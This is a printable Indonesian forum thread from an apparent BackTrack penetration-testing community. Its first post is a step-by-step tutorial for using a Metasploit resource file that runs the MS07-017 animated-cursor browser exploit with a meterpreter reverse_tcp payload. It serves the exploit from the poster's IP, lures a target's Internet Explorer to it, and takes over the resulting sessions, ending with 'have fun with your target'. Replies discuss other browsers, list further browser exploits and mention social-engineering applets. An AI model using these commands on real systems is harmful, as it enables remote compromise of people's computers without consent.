Indonesian Back|Track Team
exploit file ani (animated cursor) - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html)
+----- Thread: exploit file ani (animated cursor) (/thread-1126.html)

Pages: 1 2

exploit file ani (animated cursor) - nasa - 11-06-2011

numpang ngepost y... Smile
bugs ini udh termasuk bugs yg udah tua, tpi lumayan lah buat yag bru belajar kya ane... Big Grin.

pertama buat file ie_ani (terserah namanya apa, n text editor boleh apa aja)

Code:
# nano ie_ani

trus paste kode di bawah pada file ie_ani.. Nb SRVHOST n LHOST itu ip ente

Code:
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.56.102
set SRVPORT 80
set LHOST 192.168.56.102
set LPORT 443
set URIPATH /ani
exploit

trus save..
jalanin msfconsole dengan menggunakan resource file ie_ani
Code:
# msfconsole -r ie_ani

ini hasil'y
[Image: ie_ani.png]

trus arahin target ke ip kita lewat ie browser:
ip ane di sini 192.168.56.102 n uripath'y /ani

Code:
192.168.56.102/ani

[Image: targetrunningie.png]


akhirnya meterpreter terbuka untuk di exploitasi Smile
daftar sessions yg aktif
Code:
sessions -l
berpindah ke sessions
Code:
sessions -i <nmr sessions>
[Image: meterpreter.png]

buat command meterpreter ud prnh di bahas ama om zee di forum, search aj... n have fun with your target... Big Grin


RE: exploit file ani (animated cursor) - THJC - 11-06-2011

Wah makin mantep aja ini kayaknya si nasa Smile
Thanks om sharingnya!

RE: exploit file ani (animated cursor) - snail_venom - 11-06-2011

hanya bisa di Internet Explorer atau bisa juga di firefox dan chrome?

RE: exploit file ani (animated cursor) - nasa - 11-07-2011

Om THJC bisa ja.. nih kan berkat training di IBT.... Big Grin

(11-06-2011, 08:12 PM)snail_venom Wrote: hanya bisa di Internet Explorer atau bisa juga di firefox dan chrome?

klo di FF atau chrome blom ane cba, kl udh ad yg nyoba.. update yak... thx..

RE: exploit file ani (animated cursor) - k41t0 - 11-07-2011

naro file ani nya dimana om..??



RE: exploit file ani (animated cursor) - nasa - 11-07-2011

(11-07-2011, 09:39 AM)k41t0 Wrote: naro file ani nya dimana om..??

kl ane d root. . Tpi sbnr'y trserah dmn yg pnting tau path'y. .

RE: exploit file ani (animated cursor) - syn - 11-07-2011

eh, mau nany itukan kebetulan pake IE kalo semisal selain IE

RE: exploit file ani (animated cursor) - THJC - 11-07-2011

(11-07-2011, 07:44 PM)syn Wrote: eh, mau nany itukan kebetulan pake IE kalo semisal selain IE

Hmm om bisa melakukan testing di browser lain om Smile
Apabila sudah ditesting, dan report Smile +1 dari saya Smile

RE: exploit file ani (animated cursor) - cassaprodigy - 11-07-2011

testing lagi yah buat beda browser .. hmmm ini keren ...
mantap om nasa untuk melihat sistem2 operasi yang vurln coba ketikan

show target

RE: exploit file ani (animated cursor) - nasa - 11-08-2011

udah ane cba buat di windows 7 ie 9 , FF versi 7.0.1, 11.0.696.65 (84435) Ubuntu 10.04, ternyata udh g bisa, tapi di msfconsole mash banyak exploit buat browser windows, di msfconsole ketik aja
# search windows/browser

ato kl emang g ad yg berhasil mau g mau pake S.E.T Big Grin, java web applet... Smile